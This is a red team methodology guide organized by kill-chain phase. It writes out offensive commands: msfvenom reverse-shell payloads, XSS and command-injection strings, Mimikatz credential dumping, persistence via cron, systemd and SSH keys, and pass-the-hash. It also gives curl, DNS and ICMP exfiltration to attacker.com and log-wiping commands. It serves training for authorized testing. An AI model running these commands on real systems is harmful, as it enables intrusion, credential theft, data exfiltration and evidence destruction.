1. Introduction
2. Red Team Methodology
3. Planning & Intelligence
4. Reconnaissance
5. Weaponization
6. Delivery
7. Exploitation
8. Installation & Persistence
9. Command & Control
10. Actions on Objectives
11. Lateral Movement
12. Data Exfiltration
13. Covering Tracks
14. Red Team Tools Arsenal
15. OPSEC Considerations
16. Legal & Ethical Guidelines
17. Resources

Red Team Operations simulate real-world adversary tactics to test an organization's security posture. This guide provides a comprehensive framework for conducting professional red team engagements, following industry best practices and the MITRE ATT&CK framework.

• Emulate Real Threats: Mimic actual adversary behavior and tactics
• Test Detection Capabilities: Evaluate security controls and monitoring
• Assess Response Procedures: Test incident response and containment
• Provide Actionable Intelligence: Deliver meaningful security improvements

The traditional kill chain provides a structured approach to red team operations:

Reconnaissance → Weaponization → Delivery → Exploitation → Installation → C2 → Actions on Objectives

Modern red teams align with MITRE ATT&CK tactics:

• Initial Access: Gain foothold in target environment
• Execution: Run malicious code on target systems
• Persistence: Maintain access across system restarts
• Privilege Escalation: Obtain higher-level permissions
• Defense Evasion: Avoid detection by security controls
• Credential Access: Steal account credentials
• Discovery: Gather information about the environment
• Lateral Movement: Move through the network
• Collection: Gather data of interest
• Command & Control: Communicate with compromised systems
• Exfiltration: Steal data from the network
• Impact: Manipulate, interrupt, or destroy systems/data

📋 Essential ROE Components:
- Scope definition and boundaries
- Authorized testing methods
- Restricted targets and actions
- Communication protocols
- Emergency procedures
- Data handling requirements

• Organization Structure: Hierarchy, departments, key personnel
• Technology Stack: Operating systems, applications, security tools
• Physical Locations: Offices, data centers, remote sites
• Business Processes: Critical operations and workflows
• Public Presence: Websites, social media, public documents

• APT Groups: Relevant threat actors for the industry
• TTPs: Common tactics, techniques, and procedures
• IOCs: Indicators of compromise to emulate
• Campaign Analysis: Recent attacks against similar targets

Gather information without directly interacting with target systems:

# Company information
theHarvester -d target.com -l 500 -b all
amass enum -d target.com
subfinder -d target.com

# Social media intelligence
sherlock username
recon-ng
maltego

# Domain and DNS enumeration
dnsrecon -d target.com
fierce -dns target.com

• DNS Records: A, AAAA, MX, TXT, NS records
• WHOIS Information: Registration details, contact information
• Certificate Transparency: SSL/TLS certificates
• Shodan/Censys: Internet-connected devices and services

Direct interaction with target systems:

# Host discovery
nmap -sn 192.168.1.0/24
masscan -p1-65535 192.168.1.0/24 --rate=1000

# Port scanning
nmap -sS -T4 -p- target.com
nmap -sC -sV -p1-1000 target.com

# Service enumeration
nmap --script vuln target.com

# Directory enumeration
gobuster dir -u https://target.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
ffuf -w /usr/share/wordlists/common.txt -u https://target.com/FUZZ

# Subdomain enumeration
gobuster vhost -u https://target.com -w /usr/share/wordlists/subdomains-top1million-5000.txt

Create custom payloads to evade detection:

# Generate Windows payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=4444 -f exe -o payload.exe

# Generate Linux payload
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=4444 -f elf -o payload.elf

# Generate PowerShell payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=4444 -f powershell -o payload.ps1

# Generate beacon payload
generate -o payload.exe -x64 -b dns -d target.com

• C2 Frameworks: Cobalt Strike, Empire, Covenant, Sliver
• RATs: Remote Access Trojans for persistent access
• Droppers: First-stage payloads for delivering main implants
• Living off the Land: PowerShell, WMI, certutil, bitsadmin

Targeted email attacks against specific individuals:

# Gather email addresses
theHarvester -d target.com -l 500 -b all
hunter.io
phonebook.cz

• Domain Registration: Typosquatting, homograph attacks
• Email Server: Postfix, SendGrid, AWS SES
• SSL Certificates: Let's Encrypt for HTTPS
• Redirectors: Hide C2 infrastructure

# Gophish
gophish
# Access web interface on :3333

# Social Engineer Toolkit (SET)
setoolkit
# Select spear-phishing attack vectors

Compromise websites visited by targets:

• Target Website Analysis: Identify frequently visited sites
• Web Application Exploitation: SQL injection, XSS, file upload
• Client-Side Attacks: Browser exploits, Java/Flash vulnerabilities

• USB Drops: Rubber Ducky, Malicious USBs
• Hardware Implants: WiFi Pineapple, Packet Squirrel
• Social Engineering: Pretexting, tailgating, dumpster diving

# SQL Injection
sqlmap -u "http://target.com/page.php?id=1" --dbs
sqlmap -u "http://target.com/page.php?id=1" --dump

# Cross-Site Scripting (XSS)
<script>alert('XSS')</script>
<img src=x onerror=alert('XSS')>

# Command Injection
; cat /etc/passwd
| whoami
& net user

# SMB vulnerabilities
smbclient -L //target.com
enum4linux target.com
smbmap -H target.com

# SSH brute force
hydra -l username -P /usr/share/wordlists/rockyou.txt ssh://target.com

• Browser Exploits: CVE-based exploitation
• Office Macros: VBA macros in documents
• PDF Exploits: Malicious PDF files
• Java Exploits: Client-side Java vulnerabilities

# Registry Run Keys
New-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "SecurityUpdate" -Value "C:\temp\payload.exe"

# Scheduled Tasks
schtasks /create /sc onlogon /tn "SecurityUpdate" /tr "C:\temp\payload.exe"

# WMI Event Subscription
$FilterArgs = @{name='SecurityUpdate'; EventNameSpace='root\CimV2'; QueryLanguage="WQL"; Query="SELECT * FROM Win32_VolumeChangeEvent WHERE EventType = 2"}

# Cron jobs
(crontab -l; echo "* * * * * /tmp/payload.sh") | crontab -

# systemd service
cat > /etc/systemd/system/security-update.service << EOF
[Unit]
Description=Security Update Service
[Service]
ExecStart=/tmp/payload.sh
[Install]
WantedBy=multi-user.target
EOF

# SSH authorized_keys
echo "ssh-rsa AAAAB3NzaC1yc2E... attacker@kali" >> ~/.ssh/authorized_keys

• Rootkits: Kernel-level persistence
• Bootkit: Boot-level persistence
• UEFI Implants: Firmware-level persistence
• Golden Tickets: Kerberos persistence (AD environments)

• HTTP/HTTPS: Standard web traffic
• DNS: DNS tunneling for restrictive environments
• Social Media: Twitter, GitHub, Slack APIs
• Email: SMTP/IMAP communication
• Cloud Services: AWS, Azure, Google Cloud

Internet → CDN → Redirectors → C2 Servers → Payloads

# Apache redirector
<VirtualHost *:80>
    ServerName legitimate-domain.com
    
    # Redirect beacon traffic to C2
    RewriteEngine On
    RewriteCond %{REQUEST_URI} ^/updates/.*$
    RewriteRule ^.*$ https://c2-server.com%{REQUEST_URI} [P]
    
    # Redirect other traffic to legitimate site
    RewriteRule ^.*$ https://legitimate-site.com%{REQUEST_URI} [R,L]
</VirtualHost>

• System Information: Hardware, software, network configuration
• User Accounts: Local and domain accounts
• Sensitive Data: Databases, documents, credentials
• Security Controls: AV, EDR, monitoring tools

# Mimikatz
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords

# LaZagne
lazagne.exe all

# Browser credential extraction
SharpChrome.exe

# Windows
dir /s /b C:\ | findstr /i "password\|credential\|secret"
forfiles /p C:\ /m *.txt /s /c "cmd /c echo @path"

# Linux
find / -name "*.txt" -o -name "*.pdf" -o -name "*.doc*" 2>/dev/null
grep -r "password\|credential\|secret" /home/ 2>/dev/null

# PSExec
psexec.py domain/user:password@target.com

# WMI
wmiexec.py domain/user:password@target.com

# Pass-the-Hash
pth-winexe -U domain/user%hash //target.com cmd.exe

# Kerberoasting
GetUserSPNs.py domain/user:password -dc-ip domain-controller -request

# SSH key abuse
ssh -i stolen_key user@target.com

# sudo abuse
sudo -l
sudo -u#0 command

# SUID binaries
find / -perm -4000 2>/dev/null

# Metasploit pivoting
meterpreter > run autoroute -s 192.168.1.0/24
msf > use auxiliary/server/socks_proxy

# SSH tunneling
ssh -D 8080 user@compromised-host
ssh -L 8080:internal-host:80 user@compromised-host

# Base64 encoding
cat sensitive_data.txt | base64 | curl -X POST -d @- https://attacker.com/data

# DNS exfiltration
for i in $(cat sensitive_data.txt | base64 | tr -d '\n' | fold -w 50); do
    dig ${i}.attacker.com
done

# ICMP exfiltration
ping -c 1 -s 1000 attacker.com -p $(cat sensitive_data.txt | xxd -p | head -c 16)

• Steganography: Hide data in images, audio files
• Cloud Storage: Dropbox, Google Drive, OneDrive
• Social Media: Twitter, Pastebin, GitHub
• Blockchain: Bitcoin transactions

# Windows Event Logs
wevtutil cl Application
wevtutil cl System
wevtutil cl Security

# Linux system logs
> /var/log/auth.log
> /var/log/syslog
> /var/log/messages

# PowerShell history
Remove-Item (Get-PSReadlineOption).HistorySavePath

# Browser artifacts
Remove-Item "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\History"

# Recent files
Remove-Item "$env:USERPROFILE\AppData\Roaming\Microsoft\Windows\Recent\*"

• File Wiping: sdelete, shred
• Timestamp Manipulation: timestomp
• Memory Clearing: Clear RAM artifacts
• Network Cleanup: Clear connection logs

🔒 OPSEC Best Practices:
- Use non-attributable infrastructure
- Implement proper traffic routing
- Monitor blue team activities
- Maintain operational discipline
- Use encrypted communications
- Regularly rotate infrastructure

• Domain Fronting: Hide C2 behind legitimate domains
• Malleable Profiles: Customize beacon behavior
• Jitter and Sleep: Randomize callback timing
• Traffic Shaping: Mimic legitimate traffic patterns

• VPN/VPS Chains: Multiple layers of anonymity
• Compromised Infrastructure: Use victim systems as pivots
• Operational Timing: Align with target timezone
• Language/Culture: Avoid native language artifacts

⚖️ Legal Requirements:
- Signed contract and SOW
- Proper authorization documentation
- Clear scope and limitations
- Data handling agreements
- Incident response procedures
- Legal counsel consultation

• Minimize Impact: Avoid disrupting business operations
• Data Protection: Safeguard sensitive information
• Responsible Disclosure: Report vulnerabilities appropriately
• Professional Standards: Maintain industry best practices

• Engagement Planning: Methodology and approach
• Technical Findings: Vulnerabilities and evidence
• Risk Assessment: Business impact analysis
• Remediation: Specific improvement recommendations
• Executive Summary: High-level findings for leadership

• MITRE ATT&CK - Adversary tactics and techniques
• NIST Cybersecurity Framework - Security standards
• OWASP - Web application security

• SANS SEC564 - Red Team Operations
• CISSP - Security professional certification
• CEH - Ethical hacking certification

• "Red Team Field Manual" by Ben Clark
• "The Art of Deception" by Kevin Mitnick
• "Advanced Penetration Testing" by Wil Allsopp
• "Red Team Development and Operations" by Joe Vest

• Reddit r/redteamsec
• SANS Red Team Community
• Slack Communities

Red Team Operations require a methodical approach, combining technical expertise with operational security and ethical responsibility. This guide provides the foundation for conducting professional red team engagements that deliver meaningful security improvements while maintaining the highest standards of professionalism.

Remember: With great power comes great responsibility. Always operate within legal boundaries and ethical guidelines.

This guide is for educational and authorized testing purposes only. Unauthorized use of these techniques is illegal and unethical.